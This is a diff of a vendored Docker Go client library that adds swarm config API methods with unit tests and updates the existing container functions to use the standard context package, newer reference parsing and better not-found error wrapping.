a/vendor/github.com/docker/docker/client/client_windows.go +++ b/vendor/github.com/docker/docker/client/client_windows.go @@ -1,4 +1,7 @@ -package client +package client // import "github.com/docker/docker/client" // DefaultDockerHost defines os specific default if DOCKER_HOST is unset const DefaultDockerHost = "npipe:////./pipe/docker_engine" + +const defaultProto = "npipe" +const defaultAddr = "//./pipe/docker_engine" diff --git a/vendor/github.com/docker/docker/client/config_create.go b/vendor/github.com/docker/docker/client/config_create.go new file mode 100644 index 0000000000..c8b802ad35 --- /dev/null +++ b/vendor/github.com/docker/docker/client/config_create.go @@ -0,0 +1,25 @@ +package client // import "github.com/docker/docker/client" + +import ( + "context" + "encoding/json" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/swarm" +) + +// ConfigCreate creates a new Config. +func (cli *Client) ConfigCreate(ctx context.Context, config swarm.ConfigSpec) (types.ConfigCreateResponse, error) { + var response types.ConfigCreateResponse + if err := cli.NewVersionError("1.30", "config create"); err != nil { + return response, err + } + resp, err := cli.post(ctx, "/configs/create", nil, config, nil) + if err != nil { + return response, err + } + + err = json.NewDecoder(resp.body).Decode(&response) + ensureReaderClosed(resp) + return response, err +} diff --git a/vendor/github.com/docker/docker/client/config_create_test.go b/vendor/github.com/docker/docker/client/config_create_test.go new file mode 100644 index 0000000000..a6408792db --- /dev/null +++ b/vendor/github.com/docker/docker/client/config_create_test.go @@ -0,0 +1,70 @@ +package client // import "github.com/docker/docker/client" + +import ( + "bytes" + "context" + "encoding/json" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/swarm" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" 
+) + +func TestConfigCreateUnsupported(t *testing.T) { + client := &Client{ + version: "1.29", + client: &http.Client{}, + } + _, err := client.ConfigCreate(context.Background(), swarm.ConfigSpec{}) + assert.Check(t, is.Error(err, `"config create" requires API version 1.30, but the Docker daemon API version is 1.29`)) +} + +func TestConfigCreateError(t *testing.T) { + client := &Client{ + version: "1.30", + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + _, err := client.ConfigCreate(context.Background(), swarm.ConfigSpec{}) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestConfigCreate(t *testing.T) { + expectedURL := "/v1.30/configs/create" + client := &Client{ + version: "1.30", + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + if req.Method != "POST" { + return nil, fmt.Errorf("expected POST method, got %s", req.Method) + } + b, err := json.Marshal(types.ConfigCreateResponse{ + ID: "test_config", + }) + if err != nil { + return nil, err + } + return &http.Response{ + StatusCode: http.StatusCreated, + Body: ioutil.NopCloser(bytes.NewReader(b)), + }, nil + }), + } + + r, err := client.ConfigCreate(context.Background(), swarm.ConfigSpec{}) + if err != nil { + t.Fatal(err) + } + if r.ID != "test_config" { + t.Fatalf("expected `test_config`, got %s", r.ID) + } +} diff --git a/vendor/github.com/docker/docker/client/config_inspect.go b/vendor/github.com/docker/docker/client/config_inspect.go new file mode 100644 index 0000000000..4ac566ad89 --- /dev/null +++ b/vendor/github.com/docker/docker/client/config_inspect.go @@ -0,0 +1,36 @@ +package client // import "github.com/docker/docker/client" + +import ( + "bytes" + "context" + "encoding/json" + "io/ioutil" + + 
"github.com/docker/docker/api/types/swarm" +) + +// ConfigInspectWithRaw returns the config information with raw data +func (cli *Client) ConfigInspectWithRaw(ctx context.Context, id string) (swarm.Config, []byte, error) { + if id == "" { + return swarm.Config{}, nil, objectNotFoundError{object: "config", id: id} + } + if err := cli.NewVersionError("1.30", "config inspect"); err != nil { + return swarm.Config{}, nil, err + } + resp, err := cli.get(ctx, "/configs/"+id, nil, nil) + if err != nil { + return swarm.Config{}, nil, wrapResponseError(err, resp, "config", id) + } + defer ensureReaderClosed(resp) + + body, err := ioutil.ReadAll(resp.body) + if err != nil { + return swarm.Config{}, nil, err + } + + var config swarm.Config + rdr := bytes.NewReader(body) + err = json.NewDecoder(rdr).Decode(&config) + + return config, body, err +} diff --git a/vendor/github.com/docker/docker/client/config_inspect_test.go b/vendor/github.com/docker/docker/client/config_inspect_test.go new file mode 100644 index 0000000000..76a5dae9e5 --- /dev/null +++ b/vendor/github.com/docker/docker/client/config_inspect_test.go @@ -0,0 +1,103 @@ +package client // import "github.com/docker/docker/client" + +import ( + "bytes" + "context" + "encoding/json" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "github.com/docker/docker/api/types/swarm" + "github.com/pkg/errors" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" +) + +func TestConfigInspectNotFound(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusNotFound, "Server error")), + } + + _, _, err := client.ConfigInspectWithRaw(context.Background(), "unknown") + if err == nil || !IsErrNotFound(err) { + t.Fatalf("expected a NotFoundError error, got %v", err) + } +} + +func TestConfigInspectWithEmptyID(t *testing.T) { + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + return nil, errors.New("should not make request") + }), + } + _, _, err := 
client.ConfigInspectWithRaw(context.Background(), "") + if !IsErrNotFound(err) { + t.Fatalf("Expected NotFoundError, got %v", err) + } +} + +func TestConfigInspectUnsupported(t *testing.T) { + client := &Client{ + version: "1.29", + client: &http.Client{}, + } + _, _, err := client.ConfigInspectWithRaw(context.Background(), "nothing") + assert.Check(t, is.Error(err, `"config inspect" requires API version 1.30, but the Docker daemon API version is 1.29`)) +} + +func TestConfigInspectError(t *testing.T) { + client := &Client{ + version: "1.30", + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + + _, _, err := client.ConfigInspectWithRaw(context.Background(), "nothing") + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestConfigInspectConfigNotFound(t *testing.T) { + client := &Client{ + version: "1.30", + client: newMockClient(errorMock(http.StatusNotFound, "Server error")), + } + + _, _, err := client.ConfigInspectWithRaw(context.Background(), "unknown") + if err == nil || !IsErrNotFound(err) { + t.Fatalf("expected a configNotFoundError error, got %v", err) + } +} + +func TestConfigInspect(t *testing.T) { + expectedURL := "/v1.30/configs/config_id" + client := &Client{ + version: "1.30", + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("expected URL '%s', got '%s'", expectedURL, req.URL) + } + content, err := json.Marshal(swarm.Config{ + ID: "config_id", + }) + if err != nil { + return nil, err + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader(content)), + }, nil + }), + } + + configInspect, _, err := client.ConfigInspectWithRaw(context.Background(), "config_id") + if err != nil { + t.Fatal(err) + } + if configInspect.ID != "config_id" { + t.Fatalf("expected `config_id`, got %s", 
configInspect.ID) + } +} diff --git a/vendor/github.com/docker/docker/client/config_list.go b/vendor/github.com/docker/docker/client/config_list.go new file mode 100644 index 0000000000..2b9d54606b --- /dev/null +++ b/vendor/github.com/docker/docker/client/config_list.go @@ -0,0 +1,38 @@ +package client // import "github.com/docker/docker/client" + +import ( + "context" + "encoding/json" + "net/url" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/api/types/swarm" +) + +// ConfigList returns the list of configs. +func (cli *Client) ConfigList(ctx context.Context, options types.ConfigListOptions) ([]swarm.Config, error) { + if err := cli.NewVersionError("1.30", "config list"); err != nil { + return nil, err + } + query := url.Values{} + + if options.Filters.Len() > 0 { + filterJSON, err := filters.ToJSON(options.Filters) + if err != nil { + return nil, err + } + + query.Set("filters", filterJSON) + } + + resp, err := cli.get(ctx, "/configs", query, nil) + if err != nil { + return nil, err + } + + var configs []swarm.Config + err = json.NewDecoder(resp.body).Decode(&configs) + ensureReaderClosed(resp) + return configs, err +} diff --git a/vendor/github.com/docker/docker/client/config_list_test.go b/vendor/github.com/docker/docker/client/config_list_test.go new file mode 100644 index 0000000000..b35a592953 --- /dev/null +++ b/vendor/github.com/docker/docker/client/config_list_test.go @@ -0,0 +1,107 @@ +package client // import "github.com/docker/docker/client" + +import ( + "bytes" + "context" + "encoding/json" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/api/types/swarm" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" +) + +func TestConfigListUnsupported(t *testing.T) { + client := &Client{ + version: "1.29", + client: &http.Client{}, + } + _, err := 
client.ConfigList(context.Background(), types.ConfigListOptions{}) + assert.Check(t, is.Error(err, `"config list" requires API version 1.30, but the Docker daemon API version is 1.29`)) +} + +func TestConfigListError(t *testing.T) { + client := &Client{ + version: "1.30", + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + + _, err := client.ConfigList(context.Background(), types.ConfigListOptions{}) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestConfigList(t *testing.T) { + expectedURL := "/v1.30/configs" + + filters := filters.NewArgs() + filters.Add("label", "label1") + filters.Add("label", "label2") + + listCases := []struct { + options types.ConfigListOptions + expectedQueryParams map[string]string + }{ + { + options: types.ConfigListOptions{}, + expectedQueryParams: map[string]string{ + "filters": "", + }, + }, + { + options: types.ConfigListOptions{ + Filters: filters, + }, + expectedQueryParams: map[string]string{ + "filters": `{"label":{"label1":true,"label2":true}}`, + }, + }, + } + for _, listCase := range listCases { + client := &Client{ + version: "1.30", + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + query := req.URL.Query() + for key, expected := range listCase.expectedQueryParams { + actual := query.Get(key) + if actual != expected { + return nil, fmt.Errorf("%s not set in URL query properly. 
Expected '%s', got %s", key, expected, actual) + } + } + content, err := json.Marshal([]swarm.Config{ + { + ID: "config_id1", + }, + { + ID: "config_id2", + }, + }) + if err != nil { + return nil, err + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader(content)), + }, nil + }), + } + + configs, err := client.ConfigList(context.Background(), listCase.options) + if err != nil { + t.Fatal(err) + } + if len(configs) != 2 { + t.Fatalf("expected 2 configs, got %v", configs) + } + } +} diff --git a/vendor/github.com/docker/docker/client/config_remove.go b/vendor/github.com/docker/docker/client/config_remove.go new file mode 100644 index 0000000000..a96871e98b --- /dev/null +++ b/vendor/github.com/docker/docker/client/config_remove.go @@ -0,0 +1,13 @@ +package client // import "github.com/docker/docker/client" + +import "context" + +// ConfigRemove removes a Config. +func (cli *Client) ConfigRemove(ctx context.Context, id string) error { + if err := cli.NewVersionError("1.30", "config remove"); err != nil { + return err + } + resp, err := cli.delete(ctx, "/configs/"+id, nil, nil) + ensureReaderClosed(resp) + return wrapResponseError(err, resp, "config", id) +} diff --git a/vendor/github.com/docker/docker/client/config_remove_test.go b/vendor/github.com/docker/docker/client/config_remove_test.go new file mode 100644 index 0000000000..9c0c0f9337 --- /dev/null +++ b/vendor/github.com/docker/docker/client/config_remove_test.go @@ -0,0 +1,60 @@ +package client // import "github.com/docker/docker/client" + +import ( + "bytes" + "context" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "gotest.tools/assert" + is "gotest.tools/assert/cmp" +) + +func TestConfigRemoveUnsupported(t *testing.T) { + client := &Client{ + version: "1.29", + client: &http.Client{}, + } + err := client.ConfigRemove(context.Background(), "config_id") + assert.Check(t, is.Error(err, `"config remove" requires API version 1.30, but the Docker daemon 
API version is 1.29`)) +} + +func TestConfigRemoveError(t *testing.T) { + client := &Client{ + version: "1.30", + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + + err := client.ConfigRemove(context.Background(), "config_id") + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestConfigRemove(t *testing.T) { + expectedURL := "/v1.30/configs/config_id" + + client := &Client{ + version: "1.30", + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + if req.Method != "DELETE" { + return nil, fmt.Errorf("expected DELETE method, got %s", req.Method) + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte("body"))), + }, nil + }), + } + + err := client.ConfigRemove(context.Background(), "config_id") + if err != nil { + t.Fatal(err) + } +} diff --git a/vendor/github.com/docker/docker/client/config_update.go b/vendor/github.com/docker/docker/client/config_update.go new file mode 100644 index 0000000000..39e59cf858 --- /dev/null +++ b/vendor/github.com/docker/docker/client/config_update.go @@ -0,0 +1,21 @@ +package client // import "github.com/docker/docker/client" + +import ( + "context" + "net/url" + "strconv" + + "github.com/docker/docker/api/types/swarm" +) + +// ConfigUpdate attempts to update a Config +func (cli *Client) ConfigUpdate(ctx context.Context, id string, version swarm.Version, config swarm.ConfigSpec) error { + if err := cli.NewVersionError("1.30", "config update"); err != nil { + return err + } + query := url.Values{} + query.Set("version", strconv.FormatUint(version.Index, 10)) + resp, err := cli.post(ctx, "/configs/"+id+"/update", query, config, nil) + ensureReaderClosed(resp) + return err +} diff --git 
a/vendor/github.com/docker/docker/client/config_update_test.go b/vendor/github.com/docker/docker/client/config_update_test.go new file mode 100644 index 0000000000..1299f8278c --- /dev/null +++ b/vendor/github.com/docker/docker/client/config_update_test.go @@ -0,0 +1,61 @@ +package client // import "github.com/docker/docker/client" + +import ( + "bytes" + "context" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "github.com/docker/docker/api/types/swarm" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" +) + +func TestConfigUpdateUnsupported(t *testing.T) { + client := &Client{ + version: "1.29", + client: &http.Client{}, + } + err := client.ConfigUpdate(context.Background(), "config_id", swarm.Version{}, swarm.ConfigSpec{}) + assert.Check(t, is.Error(err, `"config update" requires API version 1.30, but the Docker daemon API version is 1.29`)) +} + +func TestConfigUpdateError(t *testing.T) { + client := &Client{ + version: "1.30", + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + + err := client.ConfigUpdate(context.Background(), "config_id", swarm.Version{}, swarm.ConfigSpec{}) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestConfigUpdate(t *testing.T) { + expectedURL := "/v1.30/configs/config_id/update" + + client := &Client{ + version: "1.30", + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + if req.Method != "POST" { + return nil, fmt.Errorf("expected POST method, got %s", req.Method) + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte("body"))), + }, nil + }), + } + + err := client.ConfigUpdate(context.Background(), "config_id", swarm.Version{}, swarm.ConfigSpec{}) + if err != nil { + 
t.Fatal(err) + } +} diff --git a/vendor/github.com/docker/docker/client/container_attach.go b/vendor/github.com/docker/docker/client/container_attach.go index eea4682158..88ba1ef639 100644 --- a/vendor/github.com/docker/docker/client/container_attach.go +++ b/vendor/github.com/docker/docker/client/container_attach.go @@ -1,16 +1,36 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "net/url" "github.com/docker/docker/api/types" - "golang.org/x/net/context" ) // ContainerAttach attaches a connection to a container in the server. // It returns a types.HijackedConnection with the hijacked connection // and the a reader to get output. It's up to the called to close // the hijacked connection by calling types.HijackedResponse.Close. +// +// The stream format on the response will be in one of two formats: +// +// If the container is using a TTY, there is only a single stream (stdout), and +// data is copied directly from the container output stream, no extra +// multiplexing or headers. +// +// If the container is *not* using a TTY, streams for stdout and stderr are +// multiplexed. +// The format of the multiplexed stream is as follows: +// +// [8]byte{STREAM_TYPE, 0, 0, 0, SIZE1, SIZE2, SIZE3, SIZE4}[]byte{OUTPUT} +// +// STREAM_TYPE can be 1 for stdout and 2 for stderr +// +// SIZE1, SIZE2, SIZE3, and SIZE4 are four bytes of uint32 encoded as big endian. +// This is the size of OUTPUT. +// +// You can use github.com/docker/docker/pkg/stdcopy.StdCopy to demultiplex this +// stream. 
func (cli *Client) ContainerAttach(ctx context.Context, container string, options types.ContainerAttachOptions) (types.HijackedResponse, error) { query := url.Values{} if options.Stream { diff --git a/vendor/github.com/docker/docker/client/container_commit.go b/vendor/github.com/docker/docker/client/container_commit.go index c766d62e40..377a2ea681 100644 --- a/vendor/github.com/docker/docker/client/container_commit.go +++ b/vendor/github.com/docker/docker/client/container_commit.go @@ -1,31 +1,33 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "encoding/json" "errors" "net/url" - distreference "github.com/docker/distribution/reference" + "github.com/docker/distribution/reference" "github.com/docker/docker/api/types" - "github.com/docker/docker/api/types/reference" - "golang.org/x/net/context" ) // ContainerCommit applies changes into a container and creates a new tagged image. func (cli *Client) ContainerCommit(ctx context.Context, container string, options types.ContainerCommitOptions) (types.IDResponse, error) { var repository, tag string if options.Reference != "" { - distributionRef, err := distreference.ParseNamed(options.Reference) + ref, err := reference.ParseNormalizedNamed(options.Reference) if err != nil { return types.IDResponse{}, err } - if _, isCanonical := distributionRef.(distreference.Canonical); isCanonical { + if _, isCanonical := ref.(reference.Canonical); isCanonical { return types.IDResponse{}, errors.New("refusing to create a tag with a digest reference") } + ref = reference.TagNameOnly(ref) - tag = reference.GetTagFromNamedRef(distributionRef) - repository = distributionRef.Name() + if tagged, ok := ref.(reference.Tagged); ok { + tag = tagged.Tag() + } + repository = reference.FamiliarName(ref) } query := url.Values{} @@ -37,7 +39,7 @@ func (cli *Client) ContainerCommit(ctx context.Context, container string, option for _, change := range options.Changes { query.Add("changes", change) } - if 
options.Pause != true { + if !options.Pause { query.Set("pause", "0") } diff --git a/vendor/github.com/docker/docker/client/container_commit_test.go b/vendor/github.com/docker/docker/client/container_commit_test.go index a844675368..8e3fe8b730 100644 --- a/vendor/github.com/docker/docker/client/container_commit_test.go +++ b/vendor/github.com/docker/docker/client/container_commit_test.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "encoding/json" "fmt" "io/ioutil" @@ -10,7 +11,6 @@ import ( "testing" "github.com/docker/docker/api/types" - "golang.org/x/net/context" ) func TestContainerCommitError(t *testing.T) { @@ -91,6 +91,6 @@ func TestContainerCommit(t *testing.T) { t.Fatal(err) } if r.ID != "new_container_id" { - t.Fatalf("expected `container_id`, got %s", r.ID) + t.Fatalf("expected `new_container_id`, got %s", r.ID) } } diff --git a/vendor/github.com/docker/docker/client/container_copy.go b/vendor/github.com/docker/docker/client/container_copy.go index 8380eeabc9..d706260cee 100644 --- a/vendor/github.com/docker/docker/client/container_copy.go +++ b/vendor/github.com/docker/docker/client/container_copy.go @@ -1,6 +1,7 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "encoding/base64" "encoding/json" "fmt" @@ -10,8 +11,6 @@ import ( "path/filepath" "strings" - "golang.org/x/net/context" - "github.com/docker/docker/api/types" ) @@ -20,29 +19,34 @@ func (cli *Client) ContainerStatPath(ctx context.Context, containerID, path stri query := url.Values{} query.Set("path", filepath.ToSlash(path)) // Normalize the paths used in the API. 
- urlStr := fmt.Sprintf("/containers/%s/archive", containerID) + urlStr := "/containers/" + containerID + "/archive" response, err := cli.head(ctx, urlStr, query, nil) if err != nil { - return types.ContainerPathStat{}, err + return types.ContainerPathStat{}, wrapResponseError(err, response, "container:path", containerID+":"+path) } defer ensureReaderClosed(response) return getContainerPathStatFromHeader(response.header) } // CopyToContainer copies content into the container filesystem. -func (cli *Client) CopyToContainer(ctx context.Context, container, path string, content io.Reader, options types.CopyToContainerOptions) error { +// Note that `content` must be a Reader for a TAR archive +func (cli *Client) CopyToContainer(ctx context.Context, containerID, dstPath string, content io.Reader, options types.CopyToContainerOptions) error { query := url.Values{} - query.Set("path", filepath.ToSlash(path)) // Normalize the paths used in the API. + query.Set("path", filepath.ToSlash(dstPath)) // Normalize the paths used in the API. // Do not allow for an existing directory to be overwritten by a non-directory and vice versa. if !options.AllowOverwriteDirWithFile { query.Set("noOverwriteDirNonDir", "true") } - apiPath := fmt.Sprintf("/containers/%s/archive", container) + if options.CopyUIDGID { + query.Set("copyUIDGID", "true") + } + + apiPath := "/containers/" + containerID + "/archive" response, err := cli.putRaw(ctx, apiPath, query, content, nil) if err != nil { - return err + return wrapResponseError(err, response, "container:path", containerID+":"+dstPath) } defer ensureReaderClosed(response) @@ -54,15 +58,15 @@ func (cli *Client) CopyToContainer(ctx context.Context, container, path string, } // CopyFromContainer gets the content from the container and returns it as a Reader -// to manipulate it in the host. It's up to the caller to close the reader. 
-func (cli *Client) CopyFromContainer(ctx context.Context, container, srcPath string) (io.ReadCloser, types.ContainerPathStat, error) { +// for a TAR archive to manipulate it in the host. It's up to the caller to close the reader. +func (cli *Client) CopyFromContainer(ctx context.Context, containerID, srcPath string) (io.ReadCloser, types.ContainerPathStat, error) { query := make(url.Values, 1) query.Set("path", filepath.ToSlash(srcPath)) // Normalize the paths used in the API. - apiPath := fmt.Sprintf("/containers/%s/archive", container) + apiPath := "/containers/" + containerID + "/archive" response, err := cli.get(ctx, apiPath, query, nil) if err != nil { - return nil, types.ContainerPathStat{}, err + return nil, types.ContainerPathStat{}, wrapResponseError(err, response, "container:path", containerID+":"+srcPath) } if response.statusCode != http.StatusOK { diff --git a/vendor/github.com/docker/docker/client/container_copy_test.go b/vendor/github.com/docker/docker/client/container_copy_test.go index 706a20c818..efddbef20d 100644 --- a/vendor/github.com/docker/docker/client/container_copy_test.go +++ b/vendor/github.com/docker/docker/client/container_copy_test.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "encoding/base64" "encoding/json" "fmt" @@ -10,8 +11,6 @@ import ( "strings" "testing" - "golang.org/x/net/context" - "github.com/docker/docker/api/types" ) @@ -25,6 +24,16 @@ func TestContainerStatPathError(t *testing.T) { } } +func TestContainerStatPathNotFoundError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusNotFound, "Not found")), + } + _, err := client.ContainerStatPath(context.Background(), "container_id", "path") + if !IsErrNotFound(err) { + t.Fatalf("expected a not found error, got %v", err) + } +} + func TestContainerStatPathNoHeaderError(t *testing.T) { client := &Client{ client: newMockClient(func(req *http.Request) (*http.Response, 
error) { @@ -95,6 +104,16 @@ func TestCopyToContainerError(t *testing.T) { } } +func TestCopyToContainerNotFoundError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusNotFound, "Not found")), + } + err := client.CopyToContainer(context.Background(), "container_id", "path/to/file", bytes.NewReader([]byte("")), types.CopyToContainerOptions{}) + if !IsErrNotFound(err) { + t.Fatalf("expected a not found error, got %v", err) + } +} + func TestCopyToContainerNotStatusOKError(t *testing.T) { client := &Client{ client: newMockClient(errorMock(http.StatusNoContent, "No content")), @@ -161,6 +180,16 @@ func TestCopyFromContainerError(t *testing.T) { } } +func TestCopyFromContainerNotFoundError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusNotFound, "Not found")), + } + _, _, err := client.CopyFromContainer(context.Background(), "container_id", "path/to/file") + if !IsErrNotFound(err) { + t.Fatalf("expected a not found error, got %v", err) + } +} + func TestCopyFromContainerNotStatusOKError(t *testing.T) { client := &Client{ client: newMockClient(errorMock(http.StatusNoContent, "No content")), @@ -195,7 +224,7 @@ func TestCopyFromContainer(t *testing.T) { return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) } if req.Method != "GET" { - return nil, fmt.Errorf("expected PUT method, got %s", req.Method) + return nil, fmt.Errorf("expected GET method, got %s", req.Method) } query := req.URL.Query() path := query.Get("path") diff --git a/vendor/github.com/docker/docker/client/container_create.go b/vendor/github.com/docker/docker/client/container_create.go index 9f627aafa6..d269a61894 100644 --- a/vendor/github.com/docker/docker/client/container_create.go +++ b/vendor/github.com/docker/docker/client/container_create.go @@ -1,13 +1,14 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "encoding/json" "net/url" "strings" 
"github.com/docker/docker/api/types/container" "github.com/docker/docker/api/types/network" - "golang.org/x/net/context" + "github.com/docker/docker/api/types/versions" ) type configWrapper struct { @@ -25,6 +26,11 @@ func (cli *Client) ContainerCreate(ctx context.Context, config *container.Config return response, err } + // When using API 1.24 and under, the client is responsible for removing the container + if hostConfig != nil && versions.LessThan(cli.ClientVersion(), "1.25") { + hostConfig.AutoRemove = false + } + query := url.Values{} if containerName != "" { query.Set("name", containerName) @@ -39,7 +45,7 @@ func (cli *Client) ContainerCreate(ctx context.Context, config *container.Config serverResp, err := cli.post(ctx, "/containers/create", query, body, nil) if err != nil { if serverResp.statusCode == 404 && strings.Contains(err.Error(), "No such image") { - return response, imageNotFoundError{config.Image} + return response, objectNotFoundError{object: "image", id: config.Image} } return response, err } diff --git a/vendor/github.com/docker/docker/client/container_create_test.go b/vendor/github.com/docker/docker/client/container_create_test.go index 15dbd5ea01..d46e70492d 100644 --- a/vendor/github.com/docker/docker/client/container_create_test.go +++ b/vendor/github.com/docker/docker/client/container_create_test.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "encoding/json" "fmt" "io/ioutil" @@ -10,7 +11,6 @@ import ( "testing" "github.com/docker/docker/api/types/container" - "golang.org/x/net/context" ) func TestContainerCreateError(t *testing.T) { @@ -22,7 +22,7 @@ func TestContainerCreateError(t *testing.T) { t.Fatalf("expected a Server Error while testing StatusInternalServerError, got %v", err) } - // 404 doesn't automagitally means an unknown image + // 404 doesn't automatically means an unknown image client = &Client{ client: newMockClient(errorMock(http.StatusNotFound, 
"Server error")), } @@ -37,7 +37,7 @@ func TestContainerCreateImageNotFound(t *testing.T) { client: newMockClient(errorMock(http.StatusNotFound, "No such image")), } _, err := client.ContainerCreate(context.Background(), &container.Config{Image: "unknown_image"}, nil, nil, "unknown") - if err == nil || !IsErrImageNotFound(err) { + if err == nil || !IsErrNotFound(err) { t.Fatalf("expected an imageNotFound error, got %v", err) } } @@ -74,3 +74,45 @@ func TestContainerCreateWithName(t *testing.T) { t.Fatalf("expected `container_id`, got %s", r.ID) } } + +// TestContainerCreateAutoRemove validates that a client using API 1.24 always disables AutoRemove. When using API 1.25 +// or up, AutoRemove should not be disabled. +func TestContainerCreateAutoRemove(t *testing.T) { + autoRemoveValidator := func(expectedValue bool) func(req *http.Request) (*http.Response, error) { + return func(req *http.Request) (*http.Response, error) { + var config configWrapper + + if err := json.NewDecoder(req.Body).Decode(&config); err != nil { + return nil, err + } + if config.HostConfig.AutoRemove != expectedValue { + return nil, fmt.Errorf("expected AutoRemove to be %v, got %v", expectedValue, config.HostConfig.AutoRemove) + } + b, err := json.Marshal(container.ContainerCreateCreatedBody{ + ID: "container_id", + }) + if err != nil { + return nil, err + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader(b)), + }, nil + } + } + + client := &Client{ + client: newMockClient(autoRemoveValidator(false)), + version: "1.24", + } + if _, err := client.ContainerCreate(context.Background(), nil, &container.HostConfig{AutoRemove: true}, nil, ""); err != nil { + t.Fatal(err) + } + client = &Client{ + client: newMockClient(autoRemoveValidator(true)), + version: "1.25", + } + if _, err := client.ContainerCreate(context.Background(), nil, &container.HostConfig{AutoRemove: true}, nil, ""); err != nil { + t.Fatal(err) + } +} diff --git 
a/vendor/github.com/docker/docker/client/container_diff.go b/vendor/github.com/docker/docker/client/container_diff.go index 1e3e554fc5..3b7c90c96c 100644 --- a/vendor/github.com/docker/docker/client/container_diff.go +++ b/vendor/github.com/docker/docker/client/container_diff.go @@ -1,16 +1,16 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "encoding/json" "net/url" - "github.com/docker/docker/api/types" - "golang.org/x/net/context" + "github.com/docker/docker/api/types/container" ) // ContainerDiff shows differences in a container filesystem since it was started. -func (cli *Client) ContainerDiff(ctx context.Context, containerID string) ([]types.ContainerChange, error) { - var changes []types.ContainerChange +func (cli *Client) ContainerDiff(ctx context.Context, containerID string) ([]container.ContainerChangeResponseItem, error) { + var changes []container.ContainerChangeResponseItem serverResp, err := cli.get(ctx, "/containers/"+containerID+"/changes", url.Values{}, nil) if err != nil { diff --git a/vendor/github.com/docker/docker/client/container_diff_test.go b/vendor/github.com/docker/docker/client/container_diff_test.go index 1ce1117684..ac215f3403 100644 --- a/vendor/github.com/docker/docker/client/container_diff_test.go +++ b/vendor/github.com/docker/docker/client/container_diff_test.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "encoding/json" "fmt" "io/ioutil" @@ -9,8 +10,7 @@ import ( "strings" "testing" - "github.com/docker/docker/api/types" - "golang.org/x/net/context" + "github.com/docker/docker/api/types/container" ) func TestContainerDiffError(t *testing.T) { @@ -31,7 +31,7 @@ func TestContainerDiff(t *testing.T) { if !strings.HasPrefix(req.URL.Path, expectedURL) { return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) } - b, err := json.Marshal([]types.ContainerChange{ + b, err := 
